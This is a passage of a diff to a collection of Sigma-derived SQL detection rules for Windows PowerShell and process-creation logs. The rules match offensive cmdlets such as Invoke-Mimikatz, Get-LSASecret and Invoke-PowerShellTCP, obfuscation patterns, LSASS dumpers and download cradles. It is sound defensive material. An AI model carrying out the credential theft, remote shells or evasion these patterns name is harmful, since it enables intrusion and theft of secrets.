files with the \".dmp\"/\".dump\" extension from a remote share", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.credential_access" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE 
'%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' 
ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload 
LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' 
ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" ], - "filename": "posh_pm_malicious_commandlets.yml" + "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" }, { - "title": "Bad Opsec Powershell Code Artifacts", - "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", + "id": "56c217c3-2de2-479b-990f-5c109ba8458f", "status": "test", - "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", - "author": "ok @securonix invrep_de, oscd.community", + "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", + "author": "Markus Neis, @Karneades", "tags": [ "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.s0111", + "attack.g0022", + "attack.g0060", + "car.2013-08-001", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high 
specificity, fp appears to be fairly limited in many environments." + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" ], - "filename": "posh_pm_bad_opsec_artifacts.yml" + "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" }, { - "title": "Remote PowerShell Session (PS Module)", - "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", + "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", + "id": "07aa184a-870d-413d-893a-157f317f6f58", "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". 
Which can be used to gather information about the target machine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.discovery", "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.t1615", + "attack.t1059.005" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')))" ], - "filename": "posh_pm_remote_powershell_session.yml" + "filename": "proc_creation_win_susp_gather_network_info_execution.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", - "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", + "title": "Use of Forfiles For Execution", + "id": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Execute commands and binaries from the context of \"forfiles\". This is used as a LOLBIN for example to bypass application whitelisting.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate use via a batch script or by an administrator." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR OriginalFileName = 'forfiles.exe') AND (CommandLine LIKE '% /p %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\') AND (CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% -m %' ESCAPE '\\') AND (CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_lolbin_forfiles.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", - "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", - "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Automated Collection Command Prompt", + "id": "f576a613-2392-4067-9d1a-9345fb58d8d1", + "status": "test", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.collection", + "attack.t1119", + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%.doc%' ESCAPE 
'\\' OR CommandLine LIKE '%.docx%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx%' ESCAPE '\\' OR CommandLine LIKE '%.ppt%' ESCAPE '\\' OR CommandLine LIKE '%.pptx%' ESCAPE '\\' OR CommandLine LIKE '%.rtf%' ESCAPE '\\' OR CommandLine LIKE '%.pdf%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\') AND ((CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '% /b %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\') OR (OriginalFileName = 'FINDSTR.EXE' AND (CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /si %' ESCAPE '\\'))))" ], - "filename": "posh_pm_invoke_obfuscation_via_var.yml" + "filename": "proc_creation_win_susp_automated_collection.yml" }, { - "title": "Suspicious PowerShell Download - PoshModule", - "id": "de41232e-12e8-49fa-86bc-c05c7e722df9", + "title": "Perl Inline Command Execution", + "id": "f426547a-e0f7-441a-b63e-854ac5bdf54d", "status": "experimental", - "description": "Detects suspicious PowerShell download command", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of perl using the \"-e\"/\"-E\" flags. 
This is could be used as a way to launch a reverse shell or execute live perl code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "PowerShell scripts that download content from the Internet" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ContextInfo LIKE '%.DownloadFile(%' ESCAPE '\\' OR ContextInfo LIKE '%.DownloadString(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\perl.exe' ESCAPE '\\' OR OriginalFileName = 'perl.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" ], - "filename": "posh_pm_susp_download.yml" + "filename": "proc_creation_win_perl_inline_command_execution.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", - "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "PUA - DIT Snapshot Viewer", + "id": "d3b70aad-097e-409c-9df2-450f80dc476b", + "status": "test", + "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", + "author": "Furkan Caliskan (@caliskanfurkan_)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate admin usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE ((EventID = 
'4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" + "filename": "proc_creation_win_pua_ditsnap.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", - "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", + "title": "HackTool - HandleKatz LSASS Dumper Execution", + "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND 
(CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" + "filename": "proc_creation_win_hktl_handlekatz.yml" }, { - "title": "Alternate PowerShell Hosts - PowerShell Module", - "id": "64e8e417-c19a-475a-8d19-98ea705394cc", + "title": "Microsoft Workflow Compiler Execution", + "id": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", "status": "test", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.", + "author": "Nik Seetharaman, frack113", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + "attack.t1127", + "attack.t1218" ], "falsepositives": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter", - "MSP Detection Searcher", - "Citrix ConfigSync.ps1" + "Legitimate MWC use (unlikely in modern enterprise environments)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ContextInfo LIKE '%' ESCAPE '\\' AND NOT (((ContextInfo LIKE '%= powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/System32/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\')) OR (ContextInfo LIKE '%= C:\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe -Embedding%' ESCAPE '\\') OR (ContextInfo LIKE '%ConfigSyncRun.exe%' 
ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\dsac.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\wsmprovhost.exe -Embedding%' ESCAPE '\\') OR ((Payload LIKE '%Update-Help%' ESCAPE '\\' OR Payload LIKE '%Failed to update Help for the module%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR OriginalFileName = 'Microsoft.Workflow.Compiler.exe'))" ], - "filename": "posh_pm_alternate_powershell_hosts.yml" + "filename": "proc_creation_win_lolbin_workflow_compiler.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", - "id": "2f211361-7dce-442d-b78a-c04039677378", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "File Encoded To Base64 Via Certutil.EXE", + "id": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", + "status": "test", + "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64. 
This can be abused by threat actors and attackers for data exfiltration", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-encode%' ESCAPE '\\' OR CommandLine LIKE '%/encode%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" + "filename": "proc_creation_win_certutil_encode.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", - "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", - "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Tasks Folder Evasion", + "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "status": "test", + "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into 
